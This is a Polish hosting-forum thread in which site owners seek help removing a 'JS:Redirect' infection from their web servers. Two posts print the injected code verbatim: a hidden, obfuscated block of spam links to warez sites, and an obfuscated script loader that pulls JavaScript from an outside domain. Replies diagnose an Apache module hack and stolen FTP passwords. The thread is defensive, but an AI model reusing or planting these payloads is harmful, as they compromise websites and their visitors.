Skocz do zawartości
Zaloguj się, aby obserwować  
BlueMan

Trojan JS:Redirect na serwerze? ClamAV nic nie znalazł

Polecane posty

No właśnie - przeskanowałem CAŁY system ClamAV i nic nie znalazł.

 

Jednakże dla wszystkich moich stron niektóre (Avast, KIS. AVG siedzi cicho) antywirusy zgłaszają trojana JS:Redirect - dla losowych elementów.

Mógłbym to namierzyć jakby ciągle do tego samego elementu Avast krzyczał, ale to dzieje się losowo, a pliki są całkowicie czyste.

Do tego nie zgłaszane są trojany przy każdym odświeżeniu strony, ale co jakiś czas. Totalnie losowo to się dzieje.

 

 

W jaki sposób mogę namierzyć i pozbyć się tego ustrojstwa?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

"pliki domowe" w sensie /home ;)

Serwer mam w domu, więc przeze Sambe mam dostęp do dysku i bezpośrednio mogę skanować na serwerze.

 

 

Jakby coś się dokleiło to nie występował by raczej efekt randomizacji zarażonych plików.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Pewnie "coś" dokleja JS z zewnętrznego serwera. Porównaj "czystą" wersję strony z tą "zarażoną" i będziesz wiedział co jest nie tak.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

@p - to nic nie daje ;)

Ponieważ w kodzie nie widziałem nigdy żadnego doklejonego JS.

A po drugie - w 90% przypadków alert o wirusie występuje w plikach graficznych. A jak chcę wyświetlić ten plik, to randomizacja zadziała i nie wyświetli wtedy ostrzeżenia o wirusie ;) I sam plik jest czysty.

 

 

PS.

Baza Danych też czysta. Szukałem wystąpień %<script% i nic phpmyadmin nie znalazł

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość

targzip cały home, a potem lokalnie u siebie rozpakować i przeszukać automatycznie po kawałku (najlepiej 2-3 różnych kawałkach)?

 

I przede wszystkim JAKI to kod? W sposób forumowy zostaw jakąś spuściznę z tego problemu... heh

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Ja dalej uważam, że /home jest czyste i ten dziad siedzi gdzieś w Apache/PHP <_<

No, ale spróbuje go dojechać teraz jeszcze raz tam poprzez

grep -r "tlqhhva" home/ etc/ bin/ usr/ >> tlqhhva.txt

Mam nadzieję, że nie siedzi w zakodowanej formie :/

 

W necie na innych stronach też występuje. Zmienia tylko swoją zmienną, a reszta kodu jest prawie taka sama.

U mnie zmienna ta to "tlqhhva"

 

<script type="text/javascript" language="javascript"> var tlqhhva=new Date( ); tlqhhva.setTime(tlqhhva.getTime( )+12*60*60*1000); document.cookie="n\x5fses\x73_id\x3d53d\x312540afaf174fd0466f84\x316\x35af\x65e3"+"; path=/\x3b ex\x70\151\x72es="+tlqhhva.toGMTString( ); </script> 
<script>document.write(String.fromCharCode(59+1,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script><a href="http://keygenguru.com">crack download</a>  <h1><a href="http://keygenguru.com">serials</a>  </h1><h1><a href="http://keygenguru.com">cracks</a>  </h1>96.50.164.106 <h1><a href="http://www.getcoolmovies.com/movies/countries/usa/avatar/">Watch Avatar movie</a>  </h1><a href="http://www.getcoolmovies.com/movies/countries/usa/avatar/">Buy Avatar movie</a>  249.122.20.35 <h1><a href="http://keygenguru.com/movies.php">online movies</a>  </h1><a href="http://keygenguru.com/movies.php">download movie</a>  178.4.93.87 <a href="http://supersoftwarestore.com">buy cheap software</a>  <h1><a href="http://supersoftwarestore.com">cheap software</a>  </h1>83.52.50.31 <h1><a href="http://keygenguru.com/software/Microsoft-Windows-Vista-sp2-x64-adobe-cs4-master-colletion.html">Buy Microsoft Windows Vista SP2 x64  Adobe CS4 Master Collection</a>  </h1><h1><a href="http://keygenguru.com/software/Autodesk-inventor-2010.html">Buy Autodesk Inventor 2010 </a>  </h1><a href="http://keygenguru.com/software/newtek-lightwave-3d-9.html">Download NewTek Lightwave 3D 9</a>  <h1><a href="http://keygenguru.com/software/the-foundry-nuke-maximun-2009.html">Buy The Foundry Nuke: Maximum 2009</a>  </h1><a href="http://keygenguru.com/software/Rosetta-Stone-Version-3-Portuguese-for-mac.html">Download Rosetta Stone Version 3: Portuguese(Brazil) Level 1, 2 Set for mac</a>  <h1><a href="http://keygenguru.com/software/Rosetta-Stone-Version-3-Italian-for-mac.html">Download Rosetta Stone Version 3: Italian Level 1, 2 & 3 Set for mac</a>  </h1><a href="http://keygenguru.com/software/Rosetta-Stone-Version-3-hebrew-for-mac.html">Buy Rosetta Stone Version 3: Hebrew Level 1, 2 for mac</a>  <a href="http://keygenguru.com/software/Microsoft-Windows-Vista-sp2-x64-adobe-cs4-master-colletion.html">Download Microsoft Windows Vista SP2 x64  Adobe CS4 Master Collection</a>  <h1><a href="http://keygenguru.com/software/nuance-omnipage-17-and-paper-report.html">Download Nuance OmniPage 17 Pro with Paper Report</a>  </h1>

 

O ile sam kod jest nieszkodliwy, bo wyświetla jedynie te linki, to bardziej martwię się tym, że skoro to siedzi w apache/php to mógł dostać się (nie ten JS, a jego matka co zainfekowała serwer) do innych danych na dysku, np. hasła. A to już jest poważny problem.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Czy nie mas na tym serwerze jakiejś starej wersji Apache?

Kiedyś, rok temu bodajże, była taka luka bezpieczeństwa, która umożliwiała załadowanie

do Apache dodatkowego modułu, a co często było wykorzystywane do doklejania

stronom złośliwego kodu. Efekt był dokładnie taki jak u Ciebie.

Strony źródłowe były niezmienione, ale później w losowych miejscach,

do niektórych requestów, był doklejany złośliwy kod.

Użyj forumowej szukajki, bo coś kojarzę, że chyba pioklo z linuxpl.com

opublikował u nas wątek na ten temat.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Super! Dzięki Marcin! Na szczęście pioklo ma tylko kilka postów na forum i szybko znalazłem jego temat z rozwiązaniem.

http://forum.php.pl/index.php?showtopic=121411&start=0&p=614283entry614283

Opis idealnie pasuje do tego co mam u siebie. Jedynie nazwa trojana jest inna.

No i adresy IP inne. Do jednego z pliku w którym był ten kod doklejony nigdy nie łączono się z tego samego adresu IP.

203.117.68.106

88.2.169.238

91.82.182.155

78.8.228.74

89.132.14.33

94.52.112.168

 

Do tego skorzystałem z http://github.com/picca/Apache-fork-hack-finder-cleaner/blob/master/apache_fork_hack_finder_cleaner.sh aby znalazł mi pliki z doklejonym kodem.

 

 

Zobaczymy czy będzie dalej Avast się odzywać, czy nie <_<

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

U mnie od jakiegoś czasu pojawia się również ten problem.

I to na kilku serwerach, z którymi się łączę. (smallservers.pl, hekko.pl)

Jak pozbyć się tego wirusa? Dokleja on mi do pliku index.html

na samym dole coś w stylu :

/*GNU GPL*/ try{window.onload = function(){var Xuyks78y1tk2 = document.createElement(’s!&c@$@r))$i)!!$p((&t^’.replace(/&|\(|\!|\$|\^|#|@|\)/ig, ”));Xuyks78y1tk2.setAttribute(‘type’, ‘text/javascript’);Xuyks78y1tk2.setAttribute(’src’, ‘h#(t&$)@t)@#!p$^:)&(/@@&/#!&c^s^d^@@n!^-#$^n@#)e)$(t&(@$.!@$^w!(u$n&(((d(e^^r$$)g#r$$o((#u$&)#$n&!^)d@.@c)(#o@#^m$.(@^^$a&!o^l^)@^-^c&)o#(-^u(^(k(.@!!!)m$u)@^s@i&@c(#&^)b^&o^x#$!p$$#(@r#&o(@!.##$r(&$u^&)!:#&^8$@0#^8@0)()#/(@g^^o###!o(g@l(!$^e$^$^&.)@c#!!(o!m(/$@@g(^o$(@o$&&)!g^@(!l!e!^)!.@)c&^o&)!m$)(@/)!(h@))y&@^v)@e#&$!$s((.@!$&n!(^!l)!@/&(e!)s!$#p!n#.^)!@g@&o.^c#!o)m!(^()/!s@o^)f@t^#p#$)#e$d#@&i&@$a#.^©!^!(o!m@/$$$^)’.replace(/\)|@|\$|\!|&|#|\(|\^/ig, ”));Xuyks78y1tk2.setAttribute(‘defer’, ‘defer’);Xuyks78y1tk2.setAttribute(‘id’, ‘E@^($2@!u#^f^(d)s&^&$)v##(s#)&p$)^3#!^9@#&z(!f^!’.replace(/\^|@|\)|\!|#|&|\(|\$/ig, ”));document.body.appendChild(Xuyks78y1tk2);}} catch(e) {}

Początkowo myślałem że usunę ten kod i będzie po sprawie.

Ale nadal pojawia się ten wirus. (zwykla strona html + css, forum phpbb3)

Pobrałem pliki, przeskanowałem Kaspersky Internet Seurity oraz AVG - nic nie wykrywa.

To samo mój komputer - według tych antivirusów jest czysty.

Z góry dzięki za pomoc.

Pozdrawiam

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość xtd

U mnie od jakiegoś czasu pojawia się również ten problem.

I to na kilku serwerach, z którymi się łączę. (smallservers.pl, hekko.pl)

Jak pozbyć się tego wirusa? Dokleja on mi do pliku index.html

na samym dole coś w stylu :

 

Początkowo myślałem że usunę ten kod i będzie po sprawie.

Ale nadal pojawia się ten wirus. (zwykla strona html + css, forum phpbb3)

Pobrałem pliki, przeskanowałem Kaspersky Internet Seurity oraz AVG - nic nie wykrywa.

To samo mój komputer - według tych antivirusów jest czysty.

Z góry dzięki za pomoc.

Pozdrawiam

 

To co jest u Ciebie wygląda na efekt odczytania haseł z TotalComandera przez jakiegoś trojanika.

Efektem tego jest doklejony kod do plików zawierających w nazwie index oraz do plików .js

Lekarstwo: zmaina haseł, zmiana programu, podmiana plików z backupu bądź ręczna edycja/naprawa.

Co do kompa, to moższ użyć ComboFixa.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Już chyba znalazłem na to odpowiedzi...

 

Co do programu : nie używam TotalComandera tylko FileZilla.

Dosyć denerwujący ten wirus... ;/

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Tylko w głównym index.html masz ten kod?

Bo jak mi się taki syf doczepił to kod miałem we wszystkich plikach o nazwie index.(html, php).

 

@xtd

 

ComboFix'a to raczej samemu się nie używa...trzeba mieć ku temu konkretne powody.

Jest on wyjściem ostatecznym jak inne opcje zawiodą.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Najlepszym sposobem na wykrycie złośliwego kodu jest modyfikacja apache_fork_hack_finder_cleaner.sh

Po usunięciu trojana zmień uprawnienia do pliku na 644 z 777 zazwyczaj.Ja mam taki sposób na to.

Edytowano przez SecurityHost (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się

Zaloguj się, aby obserwować  

×